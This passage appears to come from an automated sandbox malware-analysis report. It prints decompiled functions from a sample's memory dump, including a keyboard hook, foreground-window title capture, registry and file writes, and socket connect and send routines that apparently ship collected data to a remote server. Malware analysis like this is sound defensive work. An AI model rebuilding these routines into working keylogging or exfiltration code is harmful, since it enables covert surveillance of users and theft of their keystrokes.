                                            0x013b55c2
                                            0x013b55e6

                                            APIs
                                            • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(80000000,00000007,00000000,00000003,00000080,00000000,013C5664,?,013CBCB0,013B5614), ref: 013B5562
                                            • CreateFileW.KERNELBASE(00000000), ref: 013B5569
                                            • GetFileSize.KERNEL32(00000000,00000000), ref: 013B5578
                                            • Sleep.KERNEL32(00002710), ref: 013B55A7
                                            • FindCloseChangeNotification.KERNELBASE(00000000), ref: 013B55AE
                                            • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 013B55D6
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.611727246.00000000013B0000.00000040.00000001.sdmp, Offset: 013B0000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: FileG@2@@std@@G@std@@U?$char_traits@V?$allocator@$??0?$basic_string@?c_str@?$basic_string@ChangeCloseCreateFindNotificationSizeSleepV01@@
                                            • String ID:
                                            • API String ID: 3579047504-0
                                            • Opcode ID: de145158b4e031ec20f3e8a7062f79978eafca82d41c2fbd5252cd87b4b43a7f
                                            • Instruction ID: 01ac9a0ce0b6e04e62ac0648ff6242331cbfa2ed3f6641ebaaf8a9692df5bcf9
                                            • Opcode Fuzzy Hash: de145158b4e031ec20f3e8a7062f79978eafca82d41c2fbd5252cd87b4b43a7f
                                            • Instruction Fuzzy Hash: AE112771241640EFEB32663895CD6AABFADAB8075AF44050EF743C3D88E7A4B4488721
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 013C2D56, Relevance: 6.1, APIs: 4, Instructions: 58fileCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E013C2D56(void* __ecx, void* _a4, long _a8, long _a12, intOrPtr _a16) {
				long _v8;
				long _v12;
				intOrPtr _t14;
				void* _t15;
				int _t17;
				long _t19;
				long _t20;
				long _t22;
				long _t24;
				void* _t28;

				_t24 = 0;
				_t14 = _a16;
				if(_t14 == 0) {
					_v12 = 0x40000000;
					_v8 = 2;
				} else {
					if(_t14 == 1) {
						_t22 = 4;
						_v12 = _t22;
						_v8 = _t22;
					}
				}
				_t15 = CreateFileW(_a12, _v12, _t24, _t24, _v8, 0x80, _t24); // executed
				_t28 = _t15;
				if(_t28 != 0xffffffff) {
					if(_a16 != 1) {
						L8:
						_t17 = WriteFile(_t28, _a4, _a8,  &_a12, _t24); // executed
						if(_t17 != 0) {
							_t24 = 1;
						}
						L10:
						FindCloseChangeNotification(_t28); // executed
						_t19 = _t24;
						goto L11;
					}
					_t20 = SetFilePointer(_t28, _t24, _t24, 2); // executed
					if(_t20 == 0xffffffff) {
						goto L10;
					}
					goto L8;
				} else {
					_t19 = 0;
					L11:
					return _t19;
				}
			}













                                            0x013c2d5f
                                            0x013c2d62
                                            0x013c2d64
                                            0x013c2d74
                                            0x013c2d7b
                                            0x013c2d66
                                            0x013c2d67
                                            0x013c2d6b
                                            0x013c2d6c
                                            0x013c2d6f
                                            0x013c2d6f
                                            0x013c2d67
                                            0x013c2d93
                                            0x013c2d99
                                            0x013c2d9e
                                            0x013c2da8
                                            0x013c2dba
                                            0x013c2dc6
                                            0x013c2dce
                                            0x013c2dd0
                                            0x013c2dd0
                                            0x013c2dd2
                                            0x013c2dd3
                                            0x013c2dd9
                                            0x00000000
                                            0x013c2dd9
                                            0x013c2daf
                                            0x013c2db8
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x013c2da0
                                            0x013c2da0
                                            0x013c2ddb
                                            0x013c2dde
                                            0x013c2dde

                                            APIs
                                            • CreateFileW.KERNELBASE(?,40000000,00000000,00000000,00000002,00000080,00000000,00000000,013C623C), ref: 013C2D93
                                            • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000002), ref: 013C2DAF
                                            • WriteFile.KERNELBASE(00000000,40000000,?,?,00000000), ref: 013C2DC6
                                            • FindCloseChangeNotification.KERNELBASE(00000000), ref: 013C2DD3
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.611727246.00000000013B0000.00000040.00000001.sdmp, Offset: 013B0000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: File$ChangeCloseCreateFindNotificationPointerWrite
                                            • String ID:
                                            • API String ID: 175865374-0
                                            • Opcode ID: 1f9cf3c09f26280c7f300dfa50cfcd57d22e190d38f85ca5ccb883be2b2b74a6
                                            • Instruction ID: eac08fa2afd72d7e4fcf9196472ab8659be2ae4572b13f77ef404f242c8d9096
                                            • Opcode Fuzzy Hash: 1f9cf3c09f26280c7f300dfa50cfcd57d22e190d38f85ca5ccb883be2b2b74a6
                                            • Instruction Fuzzy Hash: 1711A171500508FFEF218F989C8CFEF7B6CEB15768F004218FA2196080C2715E508760
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 013BB522, Relevance: 6.0, APIs: 4, Instructions: 44registryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • RegOpenKeyExA.KERNELBASE(?,80000002,00000000,00020119,80000002,00000000), ref: 013BB551
                                            • RegQueryValueExA.KERNELBASE(80000002,013C40D8,00000000,00000000,?,00000400), ref: 013BB56E
                                            • RegCloseKey.ADVAPI32(80000002), ref: 013BB577
                                            • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(013C5664,?), ref: 013BB596
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.611727246.00000000013B0000.00000040.00000001.sdmp, Offset: 013B0000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: V?$allocator@$??0?$basic_string@CloseD@1@@D@2@@std@@D@std@@OpenQueryU?$char_traits@Value
                                            • String ID:
                                            • API String ID: 2462357041-0
                                            • Opcode ID: c8d237dfeafee54028cbbc332a299637ee448d865cf365123081a3bfda6628b9
                                            • Instruction ID: 18d486e22f7e56b55501983259280a30f103e22373ce109c75f0806a394372e6
                                            • Opcode Fuzzy Hash: c8d237dfeafee54028cbbc332a299637ee448d865cf365123081a3bfda6628b9
                                            • Instruction Fuzzy Hash: FF011AB650020DFFDF11DF90DC84DEA7B7CBB08358F004025FB01A5055E730AA648BA0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 013B52D5, Relevance: 6.0, APIs: 4, Instructions: 38windowCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E013B52D5(struct HHOOK__** __ecx) {
				struct tagMSG _v32;
				struct HHOOK__* _t11;
				struct HHOOK__** _t14;

				_t14 = __ecx;
				 *0x13cb9a8 = __ecx;
				if( *((intOrPtr*)(__ecx)) != 0) {
					L3:
					if(GetMessageA( &_v32, 0, 0, 0) != 0) {
						TranslateMessage( &_v32);
						DispatchMessageA( &_v32);
						goto L2;
					}
				} else {
					_t11 = SetWindowsHookExA(0xd, E013B52BA, 0, 0); // executed
					 *_t14 = _t11;
					L2:
					if( *_t14 != 0) {
						goto L3;
					}
				}
				return 0;
			}






                                            0x013b52dd
                                            0x013b52e1
                                            0x013b52e9
                                            0x013b5300
                                            0x013b530f
                                            0x013b5315
                                            0x013b531f
                                            0x00000000
                                            0x013b531f
                                            0x013b52eb
                                            0x013b52f4
                                            0x013b52fa
                                            0x013b52fc
                                            0x013b52fe
                                            0x00000000
                                            0x00000000
                                            0x013b52fe
                                            0x013b532c

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.611727246.00000000013B0000.00000040.00000001.sdmp, Offset: 013B0000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: Message$DispatchHookTranslateWindows
                                            • String ID:
                                            • API String ID: 1978648212-0
                                            • Opcode ID: 0945fd017374b4fc09c246eb756c431c95eae9d44f284f7a65ef31ea37233fb1
                                            • Instruction ID: 395913890028e8c224991508655064891d5fb67d7de792ef3a9165e86030d1cc
                                            • Opcode Fuzzy Hash: 0945fd017374b4fc09c246eb756c431c95eae9d44f284f7a65ef31ea37233fb1
                                            • Instruction Fuzzy Hash: 84F03071A01205AFD7305FAA9C4DD9BFBFCEBD5B06F500429B685E2549E6B4A041CB60
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 013B309E, Relevance: 6.0, APIs: 4, Instructions: 27COMMON
                                            Download Yara Rule
                                            APIs
                                            • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,?,?,00000001,?,?,00000000,013B8CAD,00000000), ref: 013B30B4
                                            • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?), ref: 013B30C0
                                            • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,00000000), ref: 013B30D5
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 013B30DE
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.611727246.00000000013B0000.00000040.00000001.sdmp, Offset: 013B0000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??0?$basic_string@$??1?$basic_string@?c_str@?$basic_string@D@1@@V01@@
                                            • String ID:
                                            • API String ID: 2505548081-0
                                            • Opcode ID: 9bc6dd720ce4cdc9f2c7e5d922f931fba48108d7bcdbcb4cb50f3b4464c0f1ab
                                            • Instruction ID: 45169ef7ada797c893256e19d8d7834c0d00e88fbd0b30400653ddbe1cc6efc1
                                            • Opcode Fuzzy Hash: 9bc6dd720ce4cdc9f2c7e5d922f931fba48108d7bcdbcb4cb50f3b4464c0f1ab
                                            • Instruction Fuzzy Hash: 96F0BC3260012EAFCF14EF94D8989EE7B7CFB28315F044819B91696194EB70AA15CB90
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 013BB692, Relevance: 4.5, APIs: 3, Instructions: 41registryCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E013BB692(void* _a4, void* _a8, char* _a12, char* _a16, int _a20, intOrPtr _a24, intOrPtr _a28) {
				char _v1028;
				long _t16;
				long _t19;

				_t16 = RegOpenKeyExA(_a4, _a8, 0, 0x20019,  &_a8); // executed
				if(_t16 != 0) {
					L3:
					return 0;
				} else {
					_t19 = RegQueryValueExA(_a8, _a12, 0, 0, _a16,  &_a20); // executed
					RegCloseKey(_a8); // executed
					if(_t19 != 0) {
						goto L3;
					} else {
						E013B2F9B( &_v1028, _a24, _a28);
						E013B3010( &_v1028, _a16, _a20);
						return 1;
					}
				}
			}






                                            0x013bb6ac
                                            0x013bb6b4
                                            0x013bb704
                                            0x013bb707
                                            0x013bb6b6
                                            0x013bb6c8
                                            0x013bb6d3
                                            0x013bb6dc
                                            0x00000000
                                            0x013bb6de
                                            0x013bb6ea
                                            0x013bb6fb
                                            0x013bb703
                                            0x013bb703
                                            0x013bb6dc

                                            APIs
                                            • RegOpenKeyExA.KERNELBASE(80000001,013B936A,00000000,00020019,013B936A), ref: 013BB6AC
                                            • RegQueryValueExA.KERNELBASE(013B936A,?,00000000,00000000,?,?,013CBCC0), ref: 013BB6C8
                                            • RegCloseKey.KERNELBASE(013B936A), ref: 013BB6D3
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.611727246.00000000013B0000.00000040.00000001.sdmp, Offset: 013B0000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: CloseOpenQueryValue
                                            • String ID:
                                            • API String ID: 3677997916-0
                                            • Opcode ID: 9370b0b4aa0dc44545e2fba02f6aa7bd738010db4605865f7e05b1af998d2d92
                                            • Instruction ID: 311addf0092a7b025f4193554b4f0bb1062bd0b82883cc8d35245ec896cafe55
                                            • Opcode Fuzzy Hash: 9370b0b4aa0dc44545e2fba02f6aa7bd738010db4605865f7e05b1af998d2d92
                                            • Instruction Fuzzy Hash: CA01E835200209BFDF129F50DC46FDA3B79FF54758F144014FB15A60A0E631E525EB90
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 013BB4C8, Relevance: 4.5, APIs: 3, Instructions: 38registryCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E013BB4C8(void* __ecx, void* _a4, void* _a8, char* _a12, char* _a16) {
				int _v8;
				int _v12;
				int _t14;
				long _t16;
				long _t20;
				signed int _t21;

				_t14 = 4;
				_v8 = _t14;
				_v12 = _t14;
				_t16 = RegOpenKeyExA(_a4, _a8, 0, 0x20019,  &_a8); // executed
				if(_t16 != 0) {
					return 0;
				} else {
					_t20 = RegQueryValueExA(_a8, _a12, 0,  &_v12, _a16,  &_v8); // executed
					_t21 = RegCloseKey(_a8); // executed
					return _t21 & 0xffffff00 | _t20 == 0x00000000;
				}
			}









                                            0x013bb4cf
                                            0x013bb4d0
                                            0x013bb4d3
                                            0x013bb4e7
                                            0x013bb4ef
                                            0x013bb521
                                            0x013bb4f1
                                            0x013bb505
                                            0x013bb510
                                            0x013bb51d
                                            0x013bb51d

                                            APIs
                                            • RegOpenKeyExA.KERNELBASE(80000001,013B8EBE,00000000,00020019,013B8EBE,?,?,?,013B8EBE,80000001,00000000,?,?,?,?,0000000E), ref: 013BB4E7
                                            • RegQueryValueExA.KERNELBASE(013B8EBE,?,00000000,80000001,?,00000000,013CBCB0,?,?,?,013B8EBE,80000001,00000000), ref: 013BB505
                                            • RegCloseKey.KERNELBASE(013B8EBE,?,?,?,013B8EBE,80000001,00000000,?,?,?,?,0000000E,013C5774), ref: 013BB510
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.611727246.00000000013B0000.00000040.00000001.sdmp, Offset: 013B0000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: CloseOpenQueryValue
                                            • String ID:
                                            • API String ID: 3677997916-0
                                            • Opcode ID: 809424b6d391b95efb9c98d71177e1636740968b96ca149da74cade1717c289f
                                            • Instruction ID: ec4fd8099cf5da627d5f80e54676853dcd153821aa06c1a3bfb8a23c47b2d213
                                            • Opcode Fuzzy Hash: 809424b6d391b95efb9c98d71177e1636740968b96ca149da74cade1717c289f
                                            • Instruction Fuzzy Hash: D4F0F976A00218BFDF118FA0DC45FDA7BACFB08764F148155FA05EA150E671AA50AB90
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 013C2660, Relevance: 4.5, APIs: 3, Instructions: 18COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 58%
                                            			E013C2660(intOrPtr _a4) {
				char _v5;
				short _v520;
				struct HWND__* _t6;

				_t6 = GetForegroundWindow(); // executed
				GetWindowTextW(_t6,  &_v520, 0x200);
				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z( &_v520,  &_v5);
				return _a4;
			}






                                            0x013c2669
                                            0x013c267c
                                            0x013c2690
                                            0x013c269a

                                            APIs
                                            • GetForegroundWindow.USER32 ref: 013C2669
                                            • GetWindowTextW.USER32 ref: 013C267C
                                            • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?), ref: 013C2690
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.611727246.00000000013B0000.00000040.00000001.sdmp, Offset: 013B0000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: V?$allocator@Window$??0?$basic_string@ForegroundG@1@@G@2@@std@@G@std@@TextU?$char_traits@
                                            • String ID:
                                            • API String ID: 3479648101-0
                                            • Opcode ID: def138c9eb711b8e299db5f283dc0828f4bc128098751b41d3e46559eb0f8b68
                                            • Instruction ID: f75f123e5219b2762701d495385d87f86e0e908ba3965cf3bb73df176855bf90
                                            • Opcode Fuzzy Hash: def138c9eb711b8e299db5f283dc0828f4bc128098751b41d3e46559eb0f8b68
                                            • Instruction Fuzzy Hash: 52E0ECB560030FEFDB14EBA0E94DE9977BCAB0434AF004150B616E7185DA74B649CF94
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 013C22C4, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 14COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E013C22C4(intOrPtr* _a4) {
				struct _MEMORYSTATUSEX _v68;
				intOrPtr* _t8;

				_v68.dwLength = 0x40;
				GlobalMemoryStatusEx( &_v68); // executed
				_t8 = _a4;
				 *_t8 = _v68.ullTotalPhys;
				 *((intOrPtr*)(_t8 + 4)) = _v68.ullAvailPhys;
				return _t8;
			}





                                            0x013c22cd
                                            0x013c22d5
                                            0x013c22db
                                            0x013c22e1
                                            0x013c22e6
                                            0x013c22ea

                                            APIs
                                            • GlobalMemoryStatusEx.KERNELBASE(?), ref: 013C22D5
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.611727246.00000000013B0000.00000040.00000001.sdmp, Offset: 013B0000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: GlobalMemoryStatus
                                            • String ID: @
                                            • API String ID: 1890195054-2766056989
                                            • Opcode ID: 5976299e0cc7e1ac6c315818f9550a7d3d150eb486716d01932da4cd4873ae93
                                            • Instruction ID: a6cafceebbee10e3535204a72cfdb8a4182aa5fea9683558018670fe64dce9dd
                                            • Opcode Fuzzy Hash: 5976299e0cc7e1ac6c315818f9550a7d3d150eb486716d01932da4cd4873ae93
                                            • Instruction Fuzzy Hash: 6DD06CB8901308EFCB14DF94E54999CBBBDBB48384F408058E906A7384DB74E905CB55
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 013BB8F8, Relevance: 3.0, APIs: 2, Instructions: 32COMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 013B309E: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,?,?,00000001,?,?,00000000,013B8CAD,00000000), ref: 013B30B4
                                              • Part of subcall function 013B309E: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?), ref: 013B30C0
                                              • Part of subcall function 013B309E: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,00000000), ref: 013B30D5
                                              • Part of subcall function 013B309E: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 013B30DE
                                            • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,00000000), ref: 013BB934
                                              • Part of subcall function 013BB708: RegCreateKeyA.ADVAPI32(?,?,?), ref: 013BB715
                                              • Part of subcall function 013BB708: ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(013CBCB0,00000000,?,013BB948,?,?,?,?,?,?,00000000), ref: 013BB724
                                              • Part of subcall function 013BB708: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,013BB948,?,?,?,?,?,?,00000000), ref: 013BB72E
                                              • Part of subcall function 013BB708: RegSetValueExA.KERNELBASE(?,013BB948,00000000,?,00000000,?,013BB948,?,?,?,?,?,?,00000000), ref: 013BB741
                                              • Part of subcall function 013BB708: RegCloseKey.ADVAPI32(?,?,013BB948,?,?,?,?,?,?,00000000), ref: 013BB74C
                                              • Part of subcall function 013BB708: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,013BB948,?,?,?,?,?,?,00000000), ref: 013BB75B
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 013BB950
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.611727246.00000000013B0000.00000040.00000001.sdmp, Offset: 013B0000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??0?$basic_string@??1?$basic_string@$?c_str@?$basic_string@V01@@$?size@?$basic_string@CloseCreateD@1@@Value
                                            • String ID:
                                            • API String ID: 4160275866-0
                                            • Opcode ID: 84cbcea3a769db873c369113e3ac1f8776d8a4085e12e1d745ef28a32c4747bc
                                            • Instruction ID: 08b80b1387174c37c6eee57a1fc2e1e30e8e3881dbfe6e142bd6ec3515392020
                                            • Opcode Fuzzy Hash: 84cbcea3a769db873c369113e3ac1f8776d8a4085e12e1d745ef28a32c4747bc
                                            • Instruction Fuzzy Hash: FCF01D7290011EAFCF11AFA8DC45CEE7B79BF28208F044955FA2562150EA72E5A9DF50
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 013B20C2, Relevance: 3.0, APIs: 2, Instructions: 19COMMON
                                            Download Yara Rule
                                            APIs
                                            • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,013CBE70,?,013BCF62,0000004B), ref: 013B20D1
                                              • Part of subcall function 013B2440: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(013CBE70,?,?,?,?,?,?,?,?,013B20DF,013BCF62,?,013BCF62,0000004B), ref: 013B244A
                                              • Part of subcall function 013B2440: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60([DataStart],00000013,?,?,?,?,?,?,?,?,?,013B20DF,013BCF62,?,013BCF62,0000004B), ref: 013B2463
                                              • Part of subcall function 013B2440: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(0000000B,?,?,?,?,?,?,?,?,013B20DF,013BCF62,?,013BCF62,0000004B), ref: 013B246E
                                              • Part of subcall function 013B2440: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(0000000F,?,?,?,?,?,?,?,?,013B20DF,013BCF62,?,013BCF62,0000004B), ref: 013B247B
                                              • Part of subcall function 013B2440: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,013B20DF,013BCF62,?,013BCF62,0000004B), ref: 013B248D
                                              • Part of subcall function 013B2440: ?empty@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE_NXZ.MSVCP60(?,?,?,?,?,?,?,?,013B20DF,013BCF62,?,013BCF62,0000004B), ref: 013B2498
                                              • Part of subcall function 013B2440: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,013B20DF,013BCF62,?,013BCF62,0000004B), ref: 013B24A7
                                              • Part of subcall function 013B2440: ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,013B20DF,013BCF62,?,013BCF62,0000004B), ref: 013B24B1
                                              • Part of subcall function 013B2440: send.WS2_32(?,00000000), ref: 013B24BB
                                              • Part of subcall function 013B2440: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,013B20DF,013BCF62,?,013BCF62,0000004B), ref: 013B2512
                                              • Part of subcall function 013B2440: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,013B20DF,013BCF62,?,013BCF62,0000004B), ref: 013B251B
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 013B20E7
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.611727246.00000000013B0000.00000040.00000001.sdmp, Offset: 013B0000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??1?$basic_string@$??0?$basic_string@?length@?$basic_string@A?$basic_string@V01@@$?data@?$basic_string@?empty@?$basic_string@D@1@@V01@Y?$basic_string@send
                                            • String ID:
                                            • API String ID: 868658090-0
                                            • Opcode ID: 862eb2aa410a265325efc663f907aeabe11b4913f95b07377b8f290eb90d0c0a
                                            • Instruction ID: adfd67fef8d0d14af62263c70cb9c7b8b378193c90ccc84e231ad6220af5855e
                                            • Opcode Fuzzy Hash: 862eb2aa410a265325efc663f907aeabe11b4913f95b07377b8f290eb90d0c0a
                                            • Instruction Fuzzy Hash: 36D012366001187BCB007EA8EC098997B6CDB55365F408555FE1587215EB32A62097D1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 013C3E46, Relevance: 3.0, APIs: 2, Instructions: 12COMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.611727246.00000000013B0000.00000040.00000001.sdmp, Offset: 013B0000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: __dllonexit_onexit
                                            • String ID:
                                            • API String ID: 2384194067-0
                                            • Opcode ID: 735e14421fdb98bf3536a083ccae7be116939d76c60b156a9c44d47bdca3f90d
                                            • Instruction ID: 5bc2c46e702801a0cfa2b6f09eff89dd79812fce06fd932944119a1992c11b83
                                            • Opcode Fuzzy Hash: 735e14421fdb98bf3536a083ccae7be116939d76c60b156a9c44d47bdca3f90d
                                            • Instruction Fuzzy Hash: 3DC01271504301AECF213A75FC465457723BB91F39F90971CF16D101A0C7755D25AB01
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 013B2038, Relevance: 1.5, APIs: 1, Instructions: 22networkCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 80%
                                            			E013B2038(intOrPtr* __ecx) {
				intOrPtr _t6;
				intOrPtr* _t9;

				_t9 = __ecx;
				if( *0x13cb730 != 0) {
					L2:
					_push(6);
					_push(1);
					_push(0); // executed
					L013C418E(); // executed
					 *_t9 = _t6;
					if(_t6 != 0xffffffff) {
						 *(_t9 + 0x38) =  *(_t9 + 0x38) & 0x00000000;
						 *(_t9 + 0x39) =  *(_t9 + 0x39) & 0x00000000;
						 *((intOrPtr*)(_t9 + 0x34)) = 0x3e8;
						return _t6;
					} else {
						goto L3;
					}
				} else {
					_t6 = E013B2074(); // executed
					if(_t6 == 0) {
						L3:
						return 0;
					} else {
						goto L2;
					}
				}
			}





                                            0x013b2040
                                            0x013b2042
                                            0x013b204d
                                            0x013b204d
                                            0x013b204f
                                            0x013b2051
                                            0x013b2053
                                            0x013b205b
                                            0x013b205d
                                            0x013b2063
                                            0x013b2067
                                            0x013b206b
                                            0x013b2073
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x013b2044
                                            0x013b2044
                                            0x013b204b
                                            0x013b205f
                                            0x013b2062
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x013b204b

                                            APIs
                                            • socket.WS2_32(00000000,00000001,00000006), ref: 013B2053
                                              • Part of subcall function 013B2074: WSAStartup.WS2_32(00000202,?), ref: 013B2089
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.611727246.00000000013B0000.00000040.00000001.sdmp, Offset: 013B0000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: Startupsocket
                                            • String ID:
                                            • API String ID: 3996037109-0
                                            • Opcode ID: dd2364ade92093f7b56a050cd850420fcb4d00da0317c9c50efa83f8bb77e1e8
                                            • Instruction ID: 127505d7562570d54b411d7aec9f047034c1e170bac9da90169f30b74ec6a4ca
                                            • Opcode Fuzzy Hash: dd2364ade92093f7b56a050cd850420fcb4d00da0317c9c50efa83f8bb77e1e8
                                            • Instruction Fuzzy Hash: A1E026211487A115FFB12B2865C53C32BC61B02B2CF04178CE7C05ACD7D2E43085C381
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 013B209B, Relevance: 1.5, APIs: 1, Instructions: 22networkCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 16%
                                            			E013B209B(intOrPtr* __ecx, void* _a4) {
				signed int _t3;

				_t1 = __ecx + 4; // 0x13cbe74
				_t3 = _t1;
				_push(0x10);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_push(_t3);
				_push( *__ecx);
				asm("movsd"); // executed
				L013C419A(); // executed
				asm("sbb al, al");
				return  ~_t3 + 1;
			}




                                            0x013b209f
                                            0x013b209f
                                            0x013b20a8
                                            0x013b20aa
                                            0x013b20ab
                                            0x013b20ac
                                            0x013b20ad
                                            0x013b20ae
                                            0x013b20b0
                                            0x013b20b1
                                            0x013b20b8
                                            0x013b20bf

                                            APIs
                                            • connect.WS2_32(013CBE70,013CBE74,00000010), ref: 013B20B1
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.611727246.00000000013B0000.00000040.00000001.sdmp, Offset: 013B0000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: connect
                                            • String ID:
                                            • API String ID: 1959786783-0
                                            • Opcode ID: 8f987cbbf3fb9e12a8f92e976e4f78da9b9bf78db8d1cc63ee0fa56af0114424
                                            • Instruction ID: a4d47ee66f9a0723089657d3f4d4353d058b90dd69fcf7bb0a974b39b4bd8e35
                                            • Opcode Fuzzy Hash: 8f987cbbf3fb9e12a8f92e976e4f78da9b9bf78db8d1cc63ee0fa56af0114424
                                            • Instruction Fuzzy Hash: 9ED0A73318052C7AC500DDA8EC02DF7375DDB93B60F104415FE428F051C293A95692D0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 013B2074, Relevance: 1.5, APIs: 1, Instructions: 13networkCOMMON
